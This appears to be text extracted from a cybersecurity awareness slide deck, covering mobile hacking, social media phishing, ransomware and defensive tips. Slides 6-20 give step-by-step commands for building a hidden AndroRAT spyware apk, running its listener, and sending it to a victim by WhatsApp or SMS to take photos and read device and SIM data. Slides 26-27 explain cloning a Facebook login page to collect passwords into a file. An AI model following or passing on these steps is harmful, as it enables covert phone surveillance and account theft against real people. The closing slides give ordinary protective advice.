  • 6. Mobile Hacking (Note : Only For Educational Purpose.) • Pre-requiste for Mobile Hacking: • Github installed • Python3 installed • Java installed • Local Machine (PC) IP address • Linux/Osx System
  • 7. Mobile Hacking (Note : Only For Educational Purpose.) • Attack using AndroRAT: • A Tool used to control Android phone remotely • Client/Server application • Client-Side developed in Java language • Server is developed in Python • Windows/Linux/Osx System
  • 8. Mobile Hacking (Note : Only For Educational Purpose.) • Step 1: Clone the repository from GitHub: • A following command should be used to clone the Git repository. Git clone https://github.com/karma9874/AndroRAT.git • Step 2: open the cloned repository in cmd/terminal cd <Directory_name> AndroRAT • Step 3: Installing necessary Libraries using PIP tool pip install –r requirements.txt
  • 9. Mobile Hacking (Note : Only For Educational Purpose.) • Step 4: Building Malicious apk file for spying Cell phone: • A following command should be used to build the apk file. python3 androRAT.py - -build –i <your_IP_Address> -p 8089 –o <apk_name>.apk Find IP Address: Use ipconfig /all or ifconfig on cmd/terminal. • Step 5: Host the Listener as follows: python3 androRAT.py –shell –I 0.0.0.0 –p 8089 • Step 6: Open another terminal/cmd and run WebServer sudo apachectl start
  • 10. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
  • 11. Mobile Hacking (Note : Only For Educational Purpose.) • Send generated Android .apk file to Victim cell via appending/email link, WhatsApp, SMS link etc. The victim will download it and install it as follows:
  • 12. Mobile Hacking (Note : Only For Educational Purpose.) • On Hacker side the following shell will appear and wait for listening connection:
  • 13. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears):
  • 14. Mobile Hacking (Note : Only For Educational Purpose.) • When victim install apk on their cell the following screenshot shows that a connection established (IP address appears): write help will show the command to use victim cell data. The installed apk hide it, no icons can seen on the screen
  • 15. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo shows the device information as follows:
  • 16. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 17. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo and camList shows the information as follows:
  • 18. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo camList, takepic and vibrate shows as follows:
  • 19. Mobile Hacking (Note : Only For Educational Purpose.) • The output of deviceInfo, camList, ip shows Output as follows:
  • 20. Mobile Hacking (Note : Only For Educational Purpose.) • The output of SIM information as follows:
  • 21. Social Media Hack (Facebook, Twitter, Instagram etc.) • Background: Client/Server Architecture Clients Server 1. Client side Threats 2. Server side Threats 3. Network Threats
  • 22. Social Media Hack (Facebook, Twitter, Instagram etc.) Email Spoofing & Phishing Attack • Uses a fake email address or simulates a genuine one in order to deceive user • Redirect user to webpage that looks like a social media page • Records the login information inputted, may attempt to download malware or perform XSS • According to Kapersky 1 in 5 Phishing Scams include Facebook Hacking FB Accounts Using Tabnapping.
  • 23. Social Media Hack (Facebook, Twitter, Instagram etc.) • Domain Name System (DNS): In Simple World • DNS map the Host Name with IP address, There are 13-root name servers in the world. DNS are placed on different regions world-wide. Host name ping as follows:
  • 24. Social Media Hack (Facebook, Twitter, Instagram etc.) • In Windows, the file will be located under C:WindowsSystem32driversetc.
  • 25. Social Media Hack (Facebook, Twitter, Instagram etc.) • WireShark tool is used to capture packets. let's see the traffic on the packet level: We have an IP address of 192.168.10.19, which is the IP address of our attacker
  • 26. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 1: First, we need to set up a phishing page. first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Then, make sure that you choose a complete page from the drop-down menu. The output should be an .html file. Rename the Facebook HTML page index.html. Step 2: Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request into a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.
  • 27. Social Media Hack (Facebook, Twitter, Instagram etc.) • Facebook password phishing Step by Step Step 3: Next, we will create the passwords.txt file, where the target credentials will be stored. Step 4: Now, we will copy all of these files into varwww and start the Apache services. If we open the index.html page locally, we will see that this is the phishing page that the target will see. Open the browser and navigate to http://www.facebook.com/: Now, log into your Facebook account using your username and password. and jump on the folder and see if we get anything on the passwords.txt file.
  • 28.
  • 29. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account
  • 30. Social Media Hack (Facebook, Twitter, Instagram etc.) • Countermeasures Securing the online account • Don’t click any links on an email unless you can guarantee who its from. • Use a trusted method of contacting the company via a phone number, app or website. • Mark the email as spam and contact the organisation.
  • 31. Ransomware Attack Background • Normally loaded onto a computer via a download/attachment/link from an email or website. • Will either lock the screen or encrypt your data. • Once Ransomware is uploaded on your computer/tablet/phone it is very difficult to remove without removing all of the data • Wannacry attack 2017 - One of the biggest cyber attacks to occur. • Is said to have hit 300,000 computers in 150 countries. • Companies affected include; K-electric, Life insurance company, NHS, Renault, FedEx, Spanish telecoms and gas companies, German railways etc. An Hacker Encrypt your data and demand ransom in the form of Bitcoins to decrypt back.
  • 32. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 33. Ransomware • More than a third of NHS trusts in England and Wales were affected with over 6,800 operations cancelled. The virus is spread through a vulnerability in the Windows OS known as “Eternal Blue,” .
  • 34. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 35. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows:
  • 36. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after Encryption, the file inside the folder can’t be readable.
  • 37. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable now.
  • 38. Ransomware practical demonstration • In this simulation, we will use python script to encrypt/decrypt the specific folder as follows: Output after decryption operation, the file inside the folder can be readable again.
  • 39. How to tackle Ransomware • Back up- Keep a backed up copy of your data. Ensure its not permanently connected to the network. • Patch- Keep your software up to date. Wannacry was successful as those affected computers hadn’t updated. The update contained a fix for the problem. • Attachments- Don’t click on links from emails/SMS as this could easily be from an untrusted source and contain malware like Ransomware
  • 40. Public Wi-Fi • May not be trustworthy. They could share your information to other companies who operate in countries without any data protection. • You may not know who is watching you whilst you’re online. What to do and not do to • Don’t use online banking. Use your own data. • Don’t conduct any purchases • Use a virtual private network (VPN)
  • 41.
  • 42.
  • 43.
  • 44. CYBER SECURITY Tips Tips for protecting yourself from cybersecurity threats in 2023: Password Policy Use strong passwords and change them regularly. Information Sharing vigilant Be careful about what information you share online. Firewall and Antivirus Install a firewall and antivirus software. Systems & software Keep your systems and software up to date. Unknown link and Attachments Don't click on links or open attachments from unknown senders. Data Backup Back up your data regularly. Lastly be aware of the latest cybersecurity threats.
  • 45. Passwords Advice • Use 1 password per account. • Three random words use. Like Capitals, special characters and numbers is your own choice. • If you follow this advice your passwords security will be significantly increased against a brute force attack. • Password managers can be helpful to store your passwords.
  • 46. Advice • In the physical world we’re good at protecting ourselves and our property, we need to replicate this in the digital world. • 80% of cyber-crime is preventable.
  • 47. Advice • Update and migrate • Activate your firewall • Staff awareness • Data encryption • User accounts privileges i.e admin • Cyber insurance • Prepare Plan
  • 48. You are the best defence! • Technology is only a small part of Cyber Defence • You are the most important person – protect yourself • For any businesses the most important and best defence is Cyber Security Aware employees – train your staff Always be aware! Always be on your guard! THANK YOU